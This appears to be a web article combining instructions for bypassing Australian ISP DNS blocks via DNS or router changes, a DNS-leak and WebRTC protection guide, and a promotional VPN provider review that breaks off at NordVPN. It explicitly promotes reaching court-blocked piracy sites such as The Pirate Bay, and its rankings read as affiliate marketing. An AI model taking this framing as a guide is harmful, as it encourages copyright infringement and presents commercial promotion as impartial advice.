Using a VPN Service Provider is the best, safest and fastest way to access any restricted site not only from Australia but also across the globe. When connecting to a VPN service your internet traffic is routed through the VPN server, bypassing any local geographical restrictions, blocking or checkpoints from your ISP or government.

The advantages inherent in a VPN service are many but here are some of the most important:

  • Protection against DNS Leaking
  • Accessing blocked sites without exposing your internet activity
  • Torrenting without any restrictions
  • Stopping Bandwidth throttling from your ISP – take full advantage of your internet connection
  • Accessing region-restricted websites
  • Protecting your online privacy and identity
  • The ability to run the VPN client on your workstation/laptop or any mobile device
  • Unlimited access to US Netflix and other streaming services
  • Military-grade encryption to ensure your traffic is secure from hackers and monitoring services
  • The ability to share the VPN with multiple devices and family members, including Smart TVs, streaming devices and more

Perhaps the most challenging part when it comes to a VPN service is finding the Best VPN Service that is capable of delivering fast download and upload speeds, security, portability, Netflix unblocking and strong encryption. Our Best VPN Service review provides a unique, truthful, in-depth look at 6 Top VPN service providers to help you make the best choice.

 best vpn service comparison
The Best VPN Service Providers

Mobile users can greatly benefit from a VPN service as they can safely access torrent or streaming sites while travelling or commuting on the train, tram or bus, without worrying about being blocked or tracked by their ISP.

Providers such as StrongVPN have a single-button function to activate the VPN service and unlock everything while keeping you safe. For example, when we tried accessing thepiratebay.org from our mobile phone we received the following:

Accessing thepiratebay.org from a mobile within Australia without a VPN service

We then turned to our ExpressVPN client (covered in our review). With the click of a single button (the power button in the middle) we were automatically connected to a nearby VPN server in Melbourne, which meant great speeds, stability and trouble-free access to thepiratebay.org through our heavily encrypted VPN session:

Accessing thepiratebay.org from a mobile within Australia after connecting to ExpressVPN (click to enlarge)

Another great feature is that all the reviewed VPN service providers have servers in Australia, which translates to super-fast access without any delays. The VPN servers do not use local Australian ISP DNS servers, which means they are immune to the DNS blocking implemented by ISPs.

It’s never been easier or faster to safely access and surf the internet! Our Best VPN Service review provides all necessary information to help you select the right VPN provider and never worry again about ISP blocking.

Readers can also refer to our VPN Guide for Beginners which explains how VPNs work and analyzes the security services a VPN provider must support.

Bypass DNS Blocking in Australia by Changing Your Computer’s DNS Server

DNS blocking is perhaps the easiest method to circumvent and, luckily, it also seems to be the preferred method used by all major Australian ISPs to enforce the recent Federal Court decision.

Note: While changing your DNS server is a relatively easy way to get access to blocked sites, you should be aware that your ISP is still capable of monitoring your activities when you visit these sites and download or stream content. Only a VPN service is capable of protecting your identity and hiding your online activity from your ISP and government agencies.

To bypass your ISP’s DNS Blocking simply change your DNS servers so that you are using DNS servers located outside of Australia or DNS servers not owned by any of the Australian ISPs.

Changing your DNS server settings might be easy for desktop PCs and laptops; however, it can prove more challenging for mobile users accessing the internet via their mobile network provider. For mobile users, we highly recommend a VPN service instead as it provides peace of mind - and you can activate or deactivate the VPN at the click of a button!

Bypass DNS Blocking on Windows Systems

To bypass DNS blocking on Windows systems all that’s required is to change the DNS servers used by the operating system.

Note: Windows 10 users should read our DNS Leak Testing and Prevention article to ensure they properly configure their system to avoid leaking DNS requests. VPN users won’t need to worry about this as most VPN clients have DNS Leak Protection built into the client. All VPN providers reviewed provide DNS Leak Protection.

To change your DNS server settings, simply navigate to Control Panel>Network and Sharing Centre and left-click on your network adapter connection (usually wireless). In our example this is a WiFi connection with SSID Firewall:

Accessing your wireless or wired network adapter network settings

Accessing your wireless or wired network adapter network settings

In the window that opens click on Properties (Step 1). This will open the adapter’s network properties. Now double-click on Internet Protocol Version 4 (Step 2) to open the IPv4 Properties window:

Configuring custom DNS servers to bypass DNS blocking

Configuring custom DNS servers to bypass DNS blocking (click to enlarge)

Select Use the following DNS server addresses (Step 3) and insert two DNS servers of your choice, e.g. 8.8.8.8 for the Preferred DNS server and 8.8.4.4 for the Alternate DNS server. Finally click on OK/Close (Steps 4-6) to close all windows and save the new settings.
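The same change can also be made from an elevated command prompt if you prefer. This is only a sketch: it assumes the adapter is named "Wi-Fi", so first check the exact name with netsh interface show interface and substitute it below:

  rem Point the Wi-Fi adapter at Google's public DNS servers
  netsh interface ip set dns name="Wi-Fi" static 8.8.8.8
  netsh interface ip add dns name="Wi-Fi" 8.8.4.4 index=2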

You might also need to flush your DNS cache in case you’ve already attempted to access any of the blocked sites. This can easily be done by opening a command prompt and typing ipconfig /flushdns. Alternatively simply restart your computer.

Bypass DNS Blocking On MAC OS & Ubuntu Linux

macOS and Linux users can also make changes to their systems to avoid the DNS blocking. Below is a quick guide for each operating system, followed by a command-line alternative. Steps might differ slightly depending on the O/S version:

MacOS

  • Go to System Preferences
  • Click Network
  • Select your WiFi or ethernet connection
  • Hit Advanced…
  • Click the DNS tab
  • Enter your DNS details and press OK

Ubuntu

  • Navigate to System Settings, then to Network
  • Select your connection
  • Hit Options…
  • Go to the IPv4 Settings tab
  • Enter your DNS Servers
  • Click Save
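For users comfortable with a terminal, the same settings can be applied with the built-in tools on each platform. These commands are standard, but the service and connection names ("Wi-Fi" and "Wired connection 1") are examples and need to match the names on your own system (the Ubuntu commands assume a desktop edition using NetworkManager):

  # macOS: set the DNS servers for the Wi-Fi network service
  networksetup -setdnsservers Wi-Fi 8.8.8.8 8.8.4.4

  # Ubuntu: set the DNS servers, ignore the ISP's DHCP-supplied ones, then reapply the connection
  nmcli connection modify "Wired connection 1" ipv4.dns "8.8.8.8 8.8.4.4" ipv4.ignore-auto-dns yes
  nmcli connection up "Wired connection 1"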

Bypass DNS Blocking In Australia via Router DHCP Change

Home users usually obtain their network settings automatically when connecting to their home network. By default, the router is configured with a DHCP server that is responsible for handing out IP addresses to all network clients so they can access the internet.

One of the parameters handed out by the DHCP server is the DNS server settings which are usually set to the IP address of the router or the ISP’s DNS servers. All that’s required here is to configure these values to match either Google’s DNS servers (8.8.8.8 & 8.8.4.4) or any other public DNS servers.

Below is an example of a Linksys router showing the DNS parameters under the DHCP server settings:

Bypass the Australian DNS Block by changing your router’s DHCP server DNS parameters

Bypass the Australian DNS Block by changing your router’s DHCP server DNS parameters (click to enlarge)

Changing the DNS parameters should be fairly easy assuming you can access them.

Some routers, such as the Netgear CG3000 used mainly by Optus Australia, offer DHCP services to automatically configure clients connecting to the local network but do not allow users to change the DNS parameters of the DHCP server. Users with this router, or other routers with similar restrictions, will have to manually change the DNS server settings on their computers.

Summary

Australia might have been hit by its first DNS block of ThePirateBay, Torrentz, TorrentHound, IsoHunt and the streaming service SolarMovie; however, circumventing the block has proven very easy thanks to VPN Service Providers and other technical tricks. One thing is certain – this is just the beginning of a very long battle over privacy and censorship, and it’s certainly going to get more difficult and messy as time passes and copyright holders continue to demand stricter measures and possibly penalties for Australian internet users.

Recent events show that this is the right time to start thinking about your online privacy and ensure no one is able to monitor your online activities. Do yourself a favour and visit our Best VPN Service Providers list to see how a VPN can unlock the internet, bypassing every restriction, while at the same time protecting your privacy no matter where you are in the world and what device you’re connecting from.


DNS Leak Testing & Protection – How to Avoid Exposing Your Identity & Online Activity

Despite innovations in security and technology, it’s difficult to remain anonymous online. Identifying information is seemingly everywhere – from malicious JavaScript tracking to the location services in web browsers. Even secure Linux operating systems like Tails have struggled to protect users’ privacy.

Windows 10 is no safe haven, either. By default, Microsoft collects information from users on an unprecedented level: data that can be turned over to authorities or a third party. Increasingly, users must take extra steps to ensure privacy and be more knowledgeable about the services they’re using.

This applies even to users with anonymizing software. Virtual Private Networks (VPNs) are sometimes seen as blanket tools that guarantee identity protection. In truth, they have their own vulnerabilities, and chief among them is the DNS leak, which only the best VPN service providers are able to resolve.

StrongVPN is our recommended VPN solution offering superior protection using a fast network of servers across the globe!

Understanding VPN DNS Leaks & How They Work

When you type a website URL into your browser, you’re essentially using a nickname. Typing in “firewall.cx” is more like asking a question. You send a request to a Domain Name System server, which then points you to the IP address of the site (208.86.155.203). This saves us typing long strings of numbers each time, and is better for pretty much everyone.

However, it also comes with its own problem. DNS servers are usually provided by your internet service provider (ISP), which gives the ISP a list of every website you visit. Naturally, this compromises anonymity, but VPNs are supposed to fix that. Instead of sending requests to your ISP, your traffic is routed through the VPN, protecting you.

Unfortunately, it doesn’t always work. In some cases, the operating system uses its default DNS servers instead of switching things up. This is most common in Windows, but can also happen on OSX, Linux, and mobile devices. It’s aptly named a DNS leak.

In some cases, a VPN is worse than not using one at all. Why? When using anonymising software, users have a sense of security. They may perform activities they wouldn’t otherwise, such as torrenting software or visiting controversial websites. It’s not immediately clear that a leak has occurred, and the user goes on thinking they’re safe for months at a time. In reality, their IP address is open and visible.

DNS leaks aren’t just utilized by service providers either. Websites can discover your true IP address using WebRTC, a collection of communications protocols present in most browsers. WebRTC allows for a request to a service provider’s Session Traversal Utilities for NAT (STUN) servers, listing both the local (internal) and public IP address (router WAN IP) of the user via JavaScript.

This can give a general location of the user and be used to track them across the site or other sites by the same owner. In addition, law enforcement or hackers may be able to gain access to this data, leading to serious repercussions.

DNS Leaks Used By Governments and ISPs

For example, DNS leaks were utilized by the Canadian Government in 2015, helping to track users on popular file sharing websites. Revealed by Edward Snowden, the technique combines several tactics to find out the identity of downloaders. In this case, targeted files were primarily terrorism related, but this could easily be extended to other media.

Snowden Digital Surveillance Archive: Screenshot from Canada's Levitation Program

In fact, the UK government recently passed a law that does just that. The Investigatory Powers Bill forces ISPs to store and hand over DNS records in bulk for almost every user. This is used to create a list of websites each person has visited, regardless of any wrongdoing. As a result, UK users should be especially cautious about VPN DNS leaks, and can be certain any slip ups will be recorded.

Another danger is your ISP sending a copyright warning for downloaded files. This is particularly relevant on student connections, where internet activity is more closely monitored. In some cases, it can result in a ban from the service. Your details can also be passed on to the copyright holder, who can then choose to pursue legal action.

In the student case, the user can have all of the correct settings enabled but still get a notice. It’s likely that the VPN cut out momentarily and began sending DNS requests to the wrong place. This allows the DNS to leak even if the anti-DNS leak setting is enabled.

VPN DNS leaks also occur regardless of location. Whether you’re using a VPN to protect yourself on WiFi hotspots, at work, or in your own home, the risk is still there. In fact, public networks may prove a bigger risk. It always pays to be extra cautious outside your home.

VPN DNS Leak Test – Best Sites for Testing Your DNS

Thankfully, there are very simple ways to tell if you have a VPN DNS leak. The most popular tool is an online service: DNS leak test.

First, you run your VPN client and connect to a server in a different country. Clicking Extended Test will then return a list of IP addresses, their service provider, and country of origin. If any of these match your true location, you have a problem.

The DNS leak test sends your client several different domain names, simulating a connection to each one. It then tracks the requests sent to its own DNS servers and other servers that the request bounces around before being resolved. The results are returned in your browser.

The standard test is good enough for most people, completing one round of six queries. To be completely sure, though, you should use the extended test. A total of 36 queries should be enough to discover all DNS servers. An extended test can take up to thirty seconds longer, so standard is good enough if you aren’t doing anything too sensitive.

VPN DNS leak testing is essential when you move to any new VPN client, but it’s good to test on occasion regardless. Changes in your operating system, browser settings, or an update to the VPN can all revert to incorrect servers.
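Between full browser tests, a rough command-line sanity check is also possible. The Server and Address lines at the top of any nslookup run show which resolver your operating system actually handed the query to; with the VPN connected and leak protection working, that should be the VPN provider’s DNS server rather than your ISP’s. This only shows the configured resolver, so it complements rather than replaces the full test:

  rem The Server / Address lines at the top identify the resolver in use
  nslookup example.com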

VPN DNS Leak Protection is one of the many essential security features a VPN must have. We should note that all VPN clients tested in our Best VPN Service article provide DNS Leak Protection and passed all DNS Leak tests.

VPN DNS Leak Protection

Thankfully, if you do find a leak it's not the end of the world. There are plenty of ways to protect yourself from DNS leaks, and most of them are simple. One of the best methods is to force your operating system to use the VPN’s DNS servers instead of your ISP’s. Most services will be happy to provide these; otherwise you can use a public DNS service like Google, OpenDNS or Comodo Secure DNS.

However, those looking for privacy will want to avoid companies looking to profit. Google has been known to use the data to target advertising. DNS providers like OpenNIC give a non-profit, open and uncensored service free of charge. Once you’ve found your preferred host, it’s not difficult to configure on any OS.

Windows 10 DNS Leak Protection & Prevention

In Windows 10, simply navigate to Control Panel>Network and Sharing Centre and left-click on your network adapter connection (usually wireless). In our example this is a WiFi connection with SSID Firewall:

 Accessing your Windows 10 wireless or wired network adapter settings

Accessing your Windows 10 wireless or wired network adapter settings

On the next window click on Properties (1). This will open the adapter’s network properties. Now double-click on Internet Protocol Version 4 (2) to open the IPv4 Properties window:

Configuring Windows 10 custom DNS servers to protect against DNS Leaks (click to enlarge)

Select Use the following DNS server addresses and insert two DNS servers of your choice from OpenNIC (3). Finally click on OK/Close (4-6) to close all windows and save the new settings.

If that’s too many steps, you can use a tool like DNS Jumper. You can quickly jump between different DNS servers or set your own custom ones. Furthermore, it requires no install and will test a long list of providers to find the fastest connection. This is particularly useful if you play online games, as it will avoid high ping.

MAC OS & Ubuntu Linux DNS Leak Protection

Though Mac and Linux tend to suffer from fewer issues, you may still want to set things up to be on the safe side. It’s almost the same, so we won’t go into too much detail. Here’s a quick guide:

MAC OS

  • Go to System Preferences
  • Click Network
  • Select your WiFi or ethernet connection
  • Hit Advanced…
  • Click the DNS tab
  • Enter your DNS details and press OK

Ubuntu Linux

  • Navigate to System Settings, then to Network
  • Select your connection
  • Hit Options…
  • Go to the IPv4 Settings tab
  • Enter your DNS Servers
  • Click Save

You can also configure settings on iOS, Android and even the router itself. This makes it easier to avoid the dangers of WiFi hotspots and can make all your devices safe. However, there are plenty of other ways to prevent VPN DNS leaks. These can often be used in combination with each other for maximum security.

Windows Teredo Can Lead to DNS Leaks

In Windows, a technology called Teredo, which tunnels IPv6 traffic through IPv4 packets using the UDP protocol, can often lead to DNS leaks. Essentially it allows communication between the two major IP protocols, IPv4 and IPv6. Teredo is on by default in Windows 10, but you can turn it off with a single command.

First you’ll need to open a Command Prompt window with administrator privileges. In the Search Windows box (next to the start button) type cmd, right click on Command Prompt and select Run as Administrator:

Opening a Windows Command Prompt with Administrator Privileges

Opening a Windows Command Prompt with Administrator Privileges

At the command prompt, type the following command: netsh interface teredo set state disabled:

Disabling Windows Teredo to help prevent DNS Leak

The system will return Ok, indicating that Teredo has been successfully disabled.

In some cases you may need Teredo, but thankfully it’s just as easy to enable it again. This time, type: netsh interface teredo set state type=default.
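Whichever state you choose, you can confirm it at any time with the matching show command; after disabling, the Type field should report that Teredo is disabled:

  rem Display the current Teredo configuration and state
  netsh interface teredo show state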

How to Disable WebRTC in FireFox and Chrome

Unfortunately, disabling Teredo doesn’t address the issue of WebRTC in the browser. The procedure to disable it is different for each browser, and usually involves heading to the config page.

In Mozilla’s Firefox, you can type about:config in the URL bar. Search for the media.peerconnection.enabled preference and double-click it to toggle it off:

Disabling WebRTC in Mozilla FireFox

Bear in mind that disabling WebRTC may result in a small loss of functionality. The communications protocols allow for video conferencing, file transfer and more without the need for other plugins. However, there is a fall-back method for most tasks, meaning it's far from essential.

Unfortunately, there’s no way to disable WebRTC in Chrome by default. This is to be expected, as Google pioneered the method and wants people to use it. Thankfully, Google addressed concerns early this year by releasing a plugin (make sure you open the link with Chrome).

disabling webRTC in chrome

With WebRTC Network Limiter, you can choose to expose your public IP address only or route WebRTC traffic through your proxy server (the last option). The latter is recommended for maximum safety, but can cause issues with performance.

Use a VPN with DNS Leak Protection

Fortunately, it's not just users who are aware of the DNS leak issue. Most clients have VPN DNS leak prevention built in and don’t require any input from the customer. Our Best VPN Service Provider article includes the TOP 5 VPN Service Providers with VPN Clients that automatically provide VPN DNS Leak Protection.

In most cases, VPN providers will have their own private DNS servers. StrongVPN has a “Network Lock” option, where all traffic is forced through the VPN tunnel, including domain name requests. If the VPN connection drops temporarily, internet access is cut off entirely, making sure no traffic leaves outside the tunnel. This is also known as a Kill Switch.

With PIA, DNS leak prevention is on by default. The client redirects requests to its own name servers (198.18.0.1), much like changing them manually through Windows. This makes it very unlikely that a leak will occur, and it combines with a Kill Switch option similar to StrongVPN’s. PIA also lets you bring up a third-party DNS, so you can use OpenNIC and other servers if you prefer. Both methods take a lot of work away from the user, and make it simple to prevent DNS leaks.

Summary

In all, built-in protection provides the most intuitive solution to DNS leaks. Finding a VPN that has a solution to this issue is becoming increasingly important, and without any measures there are serious risks to your privacy. It’s well worth shopping around to find a VPN service that supports DNS Leak Protection in an intelligent way.

Furthermore, VPNs that take DNS leaks seriously are more likely to take other privacy matters into consideration. A host that won’t take care of the most prevalent issue is less likely to address the smaller ones, or forgo logs.

That said, you shouldn’t blindly trust the provider’s word, either. Operating systems are complex, and it's not always possible for them to patch every hole. Sometimes problems can happen even with the protections in place. As such, DNS leak testing is essential. Taking your own measures will only increase privacy, and combining both will make this vulnerability almost non-existent.


Best VPN Service - Top VPN Service Reviews and VPN Comparisons

VPN Services have become a necessity for users concerned about their online privacy and security. With hundreds of thousands of attacks daily, new exploits and security vulnerabilities being discovered, plus government agencies and ISPs monitoring user activity, the internet is no longer considered a safe place.

With the help of a VPN Service, users are able to hide their real IP address and online activities by connecting to a VPN server and passing all traffic through that server. This way, the internet only sees the IP address of the VPN server.

Today, extended VPN Services provide us with many different and useful capabilities. For example, they can provide users with the ability to bypass geo-restrictions for streaming services such as Hulu and Netflix. They also offer increased security and identity protection for mobile devices such as iPhones, iPads, laptops, Android smartphones, tablets etc. This makes finding and selecting the best VPN Service a difficult task, as there are many parameters to take into consideration. Our dedicated network security team here at Firewall.cx has weighed these parameters for each VPN provider and then put them to the test to produce the best VPN Service review ever.

Benefits of a VPN Service

Understanding the importance and benefits of a VPN is crucial to help you decide if you need a VPN and what features you should look for. Despite the different offerings from VPN providers there are some standard benefits that you’ll always get:

  • Increased Privacy. A VPN will hide your activities from your ISP and government. Traffic entering and exiting your VPN-enabled device is encrypted, making it almost impossible to intercept and decrypt.
  • Hiding your IP address. A VPN will hide your IP address as all traffic is tunnelled through the VPN provider. Additional security features such as DNS Leak Protection will ensure your IP address and online activity are not exposed.
  • Unblocking geo-blocked services such as Netflix, Hulu and others. By connecting to a VPN server located in the country you wish to access content from, you’re able to bypass any geo-blocking.
  • Increased Torrent Download Speed. Bandwidth throttling is a big problem for home users as ISPs unofficially lower the priority of torrent data streams, resulting in slow download speeds. A VPN encrypts all traffic so the ISP is unable to determine what you’re downloading.
  • Bypass Firewall Restrictions. When connecting to a VPN server all application traffic, regardless of the ports used, is channelled through the VPN. This bypasses all restrictions enforced by a firewall or proxy server allowing you to use any application (torrent, chat, streaming, gaming, SMTP etc).

Best VPN Service Review: Quick Summary

best vpn service comparison
The Best VPN Service Providers. Scroll below for each provider's direct link.

How Our Best VPN Service Tests Were Performed

Evaluating the best VPN service can be a tricky task, especially when you take into consideration that not everyone is looking for the same features in a VPN. To give each provider a fair chance to live up to its reputation we decided to evaluate them based on the following criteria listed in order of importance:

  • SpeedTest.net Download/Upload including Latency test
  • Netflix VPN, Torrents and Blocked sites, Geo-blocking Bypass.
  • Security features (DNS Leak Protection, Kill Switch etc)
  • Encryption protocols (PPTP/L2TP IPSec/OpenVPN etc) & Support for Dedicated VPN Routers
  • No-Log Policy & Bitcoin payment support
  • User-Friendly VPN client interface
  • Price – based on a 12 month subscription

Testing US Netflix Best VPN Providers

Accessing & streaming US Netflix content is a hot topic for most of our readers which is why we’ve included it in our tests. While other reviews might indicate whether or not US Netflix is supported, we took that extra step to test and verify the service.

All Netflix stream testing was performed from a 20Mbps home broadband connection using a US Netflix account configured to stream at the highest possible setting (High) which generates 3GB/hour for HD or 7GB/hour for Ultra HD. These settings would test each VPN Provider’s ability to perform continuous, uninterrupted streaming to a home or mobile VPN user.

Best VPN Provider Download/Upload Speed Tests

Speedtest.net was selected as a testing platform to evaluate download and upload speeds. Our tests were performed from Melbourne Australia using a premium 200Mbps link to the internet while OpenVPN UDP or OpenVPN TCP (when UDP failed) was the VPN protocol used to connect to each provider. The Speedtest.net server located at San Jose, CA Server (No.4) shown below was used for download/upload test. This server was strategically selected as it’s hosted by Speedtest.net and showed stable transfer rates capable of exceeding 185Mbps.

Best VPN Service - Speed Test 

Our selected Speedtest.net server and non-VPN speed tests results (click to enlarge)

Our Speedtest.net test to San Jose, CA Server (No.4) without a VPN yielded an impressive 185Mbps download speed and 123Mbps upload speed confirming the path between us and the Speedtest.net server was not congested.

While test values still fluctuated, the tests we’ve selected to publish are the average results from each VPN Provider.

Best VPN Service Providers

Without further delay, let’s take an in-depth look at our Best VPN Service Providers:

No.1: StrongVPN

StrongVPN - Best VPN Service

StrongVPN takes the 1st position thanks to its performance and solid VPN client that provides a plethora of fine-tuning options. With more than 650 servers located in 22 countries, the number might seem small compared to other providers, but it’s rare you’ll need to frequently jump between servers to get a stable and fast connection.

StrongVPN No-Log Policy

StrongVPN provides a true No-Log Policy service which means no logs are stored about your connection or account. This makes StrongVPN ideal for users who take their privacy seriously and don’t want any type of logging from their VPN Provider.

StrongVPN Performance

While our test results fluctuated we were not concerned at all, simply because the average results were significantly faster than those of all other VPN providers. It should also be noted that testing was performed using OpenVPN TCP as OpenVPN UDP didn’t seem to work with the US-based servers we connected to. Taking into consideration that OpenVPN TCP is slightly slower than OpenVPN UDP, we were very surprised by the speeds we managed to get.

Download speeds averaged 67Mbps but managed to peak at a whopping 136Mbps, which was a fantastic result:

StrongVPN Speed Test - Download / Upload Tests

StrongVPN provides super-fast download speeds and exceptional upload speeds

Upload speeds were strong, averaging 96Mbps and peaking at an impressive 150Mbps. A similar surprise was the latency test, which averaged a very low 170ms, making it amongst the fastest, lowest-latency connections we tested. Running delay-sensitive applications or services such as VoIP or video won’t be a problem.

Finally StrongVPN offers unlimited downloading, uploading and streaming.

StrongVPN Client & Security Features

The desktop VPN client interface certainly brings back memories of an older GUI interface but we’ve been advised that it will soon be upgraded to a newer sleeker GUI on par with other providers.

The StrongVPN VPN Client GUI interface

The StrongVPN GUI interface

What the desktop GUI lacks in appearance it certainly makes up for in features and, most importantly, speed. The options available allow the end user to tweak the VPN connection, adjusting the MSS/MTU size, compression, encryption level and a whole bunch of other settings torrent users and gamers will appreciate.
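For readers who end up using the plain open-source OpenVPN client instead of the GUI (as Linux users must, see below), much of the same tuning is exposed as ordinary command-line options. This is only an illustrative sketch; the file name is hypothetical and the values need to suit your own connection:

  rem Example tuning of MSS clamping, tunnel MTU and cipher with the generic OpenVPN client
  openvpn --config strongvpn.ovpn --mssfix 1400 --tun-mtu 1500 --cipher AES-128-CBC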

A Kill Switch and DNS Leak Protection are built into the client, and users can select the encryption protocol of their choice, which includes OpenVPN (TCP or UDP), L2TP/IPsec, PPTP or SSTP. Changing between countries or cities is an easy process: simply select the desired country/city from the middle drop-down list and click Connect. This will change your account preferences and force the client to connect to the new location.

In contrast to the desktop VPN client, the mobile StrongVPN client will leave you wondering if we are talking about the same provider. It’s an impressive stylish application that resonates with the message “We mean serious business here”:

StrongVPN mobile client – a stunning application

The StrongVPN client is available for Windows, MAC, mobile iOS and Android devices. Users can change country/city as required and simply hit the power button in the middle of the screen – once connected the button will turn green as shown above.

StrongVPN does not offer its own Linux-based VPN client, however, Linux users can download and use the open-source OpenVPN client which is fully compatible.

StrongVPN Supports Netflix VPN Streaming

We were very pleased to see US Netflix work with StrongVPN. StrongVPN had the most US-based VPN servers from which Netflix would work without a problem. This is definitely a major advantage over its competition.

US Netflix HD streaming with StrongVPN (click to enlarge)

Streaming High Definition video didn’t seem like a real challenge for StrongVPN as it was able to stream continuously without any glitches even when downloading torrents and performing casual web browsing. Again, speed and bandwidth availability is the key ingredient here.

StrongVPN Router Software & Support

StrongVPN does not develop its own router firmware; however, it does provide detailed instructions on how to set up DD-WRT, Tomato by Shibby (no longer developed), Sabai Router OS, Mikrotik RouterOS and other operating systems to connect to its VPN network. StrongVPN support contains perhaps the largest database of router devices and operating systems amongst all VPN Providers reviewed.

Encryption protocols supported for Router VPNs are OpenVPN (TCP or UDP) and PPTP, however, in order to take full advantage of the speeds the VPN Provider is capable of delivering, you’ll need to ensure your router has enough CPU horsepower under the hood!

StrongVPN Pricing & Plans

The $3.97US/month price tag (based on a yearly subscription) is a fantastic deal considering the features the service provides. The limit of 2 simultaneous VPN logins is slightly restrictive but everything else was simply great. The 5 day money-back guarantee was also acceptable as it allows users enough time to properly evaluate the service.

In closing, StrongVPN accepts Bitcoin payments along with PayPal and Visa, providing users with more than enough payment options.

Click here to read our recent in-depth review of StrongVPN

 visit best VPN service - StrongVPN

 

No.2: ExpressVPN

ExpressVPN - Best VPN Service

ExpressVPN is another great choice. A reputable VPN service provider, ExpressVPN offers superior VPN connectivity and very fast download speeds across its 1000+ servers spread across 87 countries.

ExpressVPN No-Log Policy

ExpressVPN’s No-Log Policy states that it doesn’t track its users’ activities, but it does maintain information such as the dates (not times) of connections to the VPN service, the VPN server connected to and the amount of data transferred. While torrent users might not like the idea that some information is logged, ExpressVPN clearly states on its website that the information collected cannot be used to identify its users.

ExpressVPN Performance

ExpressVPN performed extremely well and was able to provide sustained transfers for both speed tests and torrent downloads. Download speeds averaged a bit more than 30Mbps which is adequate for torrenting, gaming, video streaming and casual web browsing.

ExpressVPN offers great download and upload speeds

Upload speeds were also a pleasant surprise averaging 65Mbps and peaking at 81.69Mbps! Our tests were performed using the OpenVPN UDP protocol.

Latency was a low and stable 193ms, making the provider suitable for all types of traffic including delay-sensitive VoIP. ExpressVPN offers unlimited downloading, uploading and streaming.

ExpressVPN Client & Security Features

Don’t be fooled by the ExpressVPN client’s simple interface, as behind the three buttons and menu (top left) users will find a lot of features and settings that can be enabled as required. Security-conscious users will enjoy the Kill Switch, DNS Leak Protection and the ability to easily select the encryption protocol of their choice, which includes OpenVPN (TCP or UDP), L2TP/IPsec, PPTP and SSTP, or simply leave it to the VPN client to select the most suitable.

The ExpressVPN VPN client: A combination of simplicity and great functionality

The Smart Location feature is extremely handy for users who travel frequently. It automatically selects the nearest VPN server based on your current location, in an effort to provide you with the fastest possible VPN experience.

The ExpressVPN client is available for Windows, MAC, mobile iOS and Android devices but also Linux 32/64bit Ubuntu, Debian, Fedora, and CentOS. It should be noted that ExpressVPN is the only provider to have developed its own VPN client for such a wide range of Linux distributions. Nice!

ExpressVPN Supports Netflix VPN Streaming

After connecting to a number of US-based servers we were able to find a few that happily supported Netflix. Streaming High Definition video was smooth without delays, which was very pleasing. While Netflix buffers the video using short high-bandwidth bursts that reached up to 9Mbps, ExpressVPN was able to deliver without a problem.

US Netflix HD streaming with ExpressVPN (click to enlarge)

ExpressVPN Router Software & Support

ExpressVPN has developed its own firmware that supports specific retail routers enabling customers to tunnel all their internet traffic through ExpressVPN’s servers. Customers have the choice to purchase a router preloaded with firmware or download and install it on an existing compatible router. ExpressVPN also provides support for its firmware, ensuring customers are not left in the dark should problems arise.

ExpressVPN Pricing & Plans

At $8.32US/month (based on a yearly subscription) ExpressVPN’s pricing is higher than its competitors’; however, it does support up to 3 simultaneous VPN logins and users will certainly get their money’s worth thanks to great speeds, support for Netflix (via specific US-based servers) and a 30 day money-back guarantee. Users who prefer can also make payments via Bitcoin for an extra layer of anonymity.

visit best VPN service - ExpressVPN

 

No.3: IPVANISH

IPVANISH Best VPN Service

IPVANISH is one of the most popular VPN Service Providers available. Its robust VPN services are spread across more than 700 servers located in 60 countries. IPVANISH offers a number of great features, including a SOCKS5 proxy for customers who want to quickly bypass regional restrictions and are not concerned about encryption.

IPVANISH No-Log Policy

IPVANISH advertises a No-Log Policy which means users can connect to the global IPVANISH VPN network knowing their activities are not tracked or monitored by the provider. IPVANISH does not indicate that it keeps any type of logs that might be able to be used against its customers.

Logging might be enabled temporarily during a technical support case to help troubleshoot a customer problem.

IPVANISH Performance

Bandwidth and VPN performance won’t be a problem thanks to fast servers which didn’t appear to be congested and were able to provide a sustainable download speed for our Torrent download test and video streaming. Our tests were performed using the OpenVPN UDP protocol and showed average download speeds of around 39Mbps while upload speeds were averaging an impressive 90Mbps peaking at 121.69Mbps!

IPVANISH Great Download and Upload Speed Tests

IPVANISH speed tests provided excellent results and acceptable latency

Latency was a low 215ms considering our packets were travelling from Melbourne, Australia to San Jose, US via the VPN provider. The round-trip delay for voice packets (VoIP) shouldn’t exceed 300ms, or 150ms latency in each direction, so the 215ms we got was suitable for pretty much any application or service a user would want to run over the VPN. IPVANISH offers unlimited downloading, uploading and streaming.

IPVANISH VPN Client & Security Features

IPVANISH offers a great VPN client that supports Windows, MAC, iOS and Android (phones + tablets) plus Ubuntu Linux, making it one of only two providers offering native application support for the great Linux operating system.

The VPN client is packed with some great security features, including Kill Switch, DNS Leak Protection, IPv6 Leak Protection and the ability to obfuscate OpenVPN traffic to avoid it being detected by intelligent Firewalls. It even has an awesome Simple Mode feature that replaces the fairly large GUI interface with a small neat window as shown below:

IPVANISH Best VPN Client Advanced and Simple Mode

The IPVANISH VPN client switching between Advanced and Simple mode

Support for all the popular VPN protocols, such as PPTP, L2TP and OpenVPN (TCP/UDP) is there to accommodate different encryption requirements even though users would rarely want to use anything other than OpenVPN.

Finally, a neat feature we really liked was the ability to automatically locate the best VPN Server based on the country we wanted to connect to – this made it really easy to ensure we were automatically directed to a non-congested VPN server.

IPVANISH Supports Netflix VPN Streaming

Netflix users will be happy to learn that we were successfully able to watch our favourite movies using the highest possible video streaming setting (HD – High Definition) for our test bed (HD Laptop). The VPN provider was able to provide a sustainable 5Mbps download speed delivering an enjoyable experience without any glitches:

 US Netflix HD streaming with IP Vanish VPN

US Netflix HD streaming with IP Vanish VPN (click to enlarge)

While Netflix users might need to try different US-based VPN Servers to find a server that is not blocked, we were able to stream from the first VPN server we connected to! Further testing did reveal some of the provider’s servers are blocked by Netflix, however, that is to be expected with most VPN providers.

IPVANISH VPN Router Software & Support

While IPVANISH doesn’t create its own Router App, it does support the well-known DD-WRT and Tomato by Shibby software platforms. IPVANISH provides detailed step-by-step instructions on its site on how to set up OpenVPN (UDP and TCP) on these platforms to connect to its network.

IP VANISH Pricing & Plans

With up to 5 simultaneous VPN logins allowed (one for every family member!), a monthly price of just $6.49US (based on a yearly subscription) and a 7 day money-back guarantee, you definitely can’t go wrong. It should also be noted that IPVANISH fully supports Bitcoin payments.

visit best VPN service - IPVanish

 

No.4: NordVPN

NordVPN Best VPN Service

